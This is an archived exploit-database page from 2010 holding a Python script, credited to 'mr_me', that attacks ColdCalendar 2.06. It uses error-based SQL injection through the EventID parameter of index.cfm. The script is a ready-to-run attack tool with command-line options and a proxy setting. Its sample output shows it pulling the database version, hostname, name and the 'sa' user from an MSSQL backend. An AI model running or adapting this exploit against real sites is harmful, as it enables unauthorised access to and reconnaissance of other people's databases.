[webapps / 0day] - ColdCalendar 2.06 SQL Injection Exploit
Posted on 06 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>ColdCalendar 2.06 SQL Injection Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: mr_me' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>======================================= ColdCalendar 2.06 SQL Injection Exploit ======================================= #!/usr/bin/python # ColdGen - coldcalender v2.06 Remote 0day SQL Injection Exploit # Vendor: http://www.coldgen.com/ # Found by: mr_me # -----------------------------------------------> # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # -----------------------------------------------> # The vulnerability: # =================== # - SQL Injection in the index.cfm using parameters: EventID # # This tool assumes the target has a MSSQL backend. # ./ColdCal0day.py -p localhost:8080 -t localhost:8500 -d /coldcal/ # # | ----------------------------------------------------------- | # | -= ColdCalender v2.06 Remote 0day SQL Injection Exploit =- | # | --------------[ by mr_me - net-ninja.net ]----------------- | # # (+) Exploiting target @: http://localhost:8500/coldcal/ # # (+) Testing Proxy... # (+) Proxy @ localhost:8080 # (+) Building Handler.. # # (!) Found database version: # # Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) # Aug 19 2006 20:47:07 # Copyright (c) 1988-2005 Microsoft Corporation # Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) # # (!) Found database hostname: 127.0.0.1 # # (!) Found database user: sa # # (!) Found database name: coldcal import sys, httplib, urllib2, urllib, re from optparse import OptionParser usage = "./%prog [<options>] -t [target] -d [directory]" usage += " Example: ./%prog -p localhost:8080 -t localhost:8500 -d /coldcal/" parser = OptionParser(usage=usage) parser.add_option("-p", type="string",action="store", dest="proxy", help="HTTP Proxy <server:port>") parser.add_option("-t", type="string", action="store", dest="target", help="The Target server <server:port>") parser.add_option("-d", type="string", action="store", dest="directory", help="Directory path to the CMS") (options, args) = parser.parse_args() def banner(): print " | ----------------------------------------------------------- |" print " | -= ColdCalender v2.06 Remote 0day SQL Injection Exploit =- |" print " | --------------[ by mr_me - net-ninja.net ]----------------- | " if len(sys.argv) < 5: banner() parser.print_help() sys.exit(1) def getProxy(): try: pr = httplib.HTTPConnection(options.proxy) pr.connect() proxy_handler = urllib2.ProxyHandler({'http': options.proxy}) except(socket.timeout): print " (-) Proxy Timed Out" sys.exit(1) except(),msg: print " (-) Proxy Failed" sys.exit(1) return proxy_handler def setTargetHTTP(): if options.target[0:7] != 'http://': options.target = "http://" + options.target return options.target def getRequest(exploit): if options.proxy: try: proxyfier = urllib2.build_opener(getProxy()) check = proxyfier.open(options.target+options.directory+exploit).read() except urllib2.HTTPError, error: check = error.read() except socket.error: print "(-) Proxy connection failed" sys.exit(1) else: try: req = urllib2.Request(options.target+options.directory+exploit) check = urllib2.urlopen(req).read() except urllib2.HTTPError, error: check = error.read() except urllib2.URLError: print "(-) Target connection failed, check your address" sys.exit(1) return check basicInfo = {'user: ':'user_name()', 'name: ':'db_name()', 'hostname: ':'host_name()','version: ':'@@version'} def basicSploit(info): return "index.cfm?fuseaction=ViewEventDetails&EventID=1+and+1=convert(int," + info + ")--" if __name__ == "__main__": banner() options.target = setTargetHTTP() print "(+) Exploiting target @: %s" % (options.target+options.directory) if options.proxy: print " (+) Testing Proxy..." print "(+) Proxy @ %s" % (options.proxy) print "(+) Building Handler.." for key in basicInfo: getResp = getRequest(basicSploit(basicInfo[key])) if re.findall("the nvarchar value '", getResp): dbInfo = getResp.split('the nvarchar value '')[1].split('' to data type int')[0] print " (!) Found database %s%s" % (key, dbInfo.rstrip()) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-06]</pre></body></html>
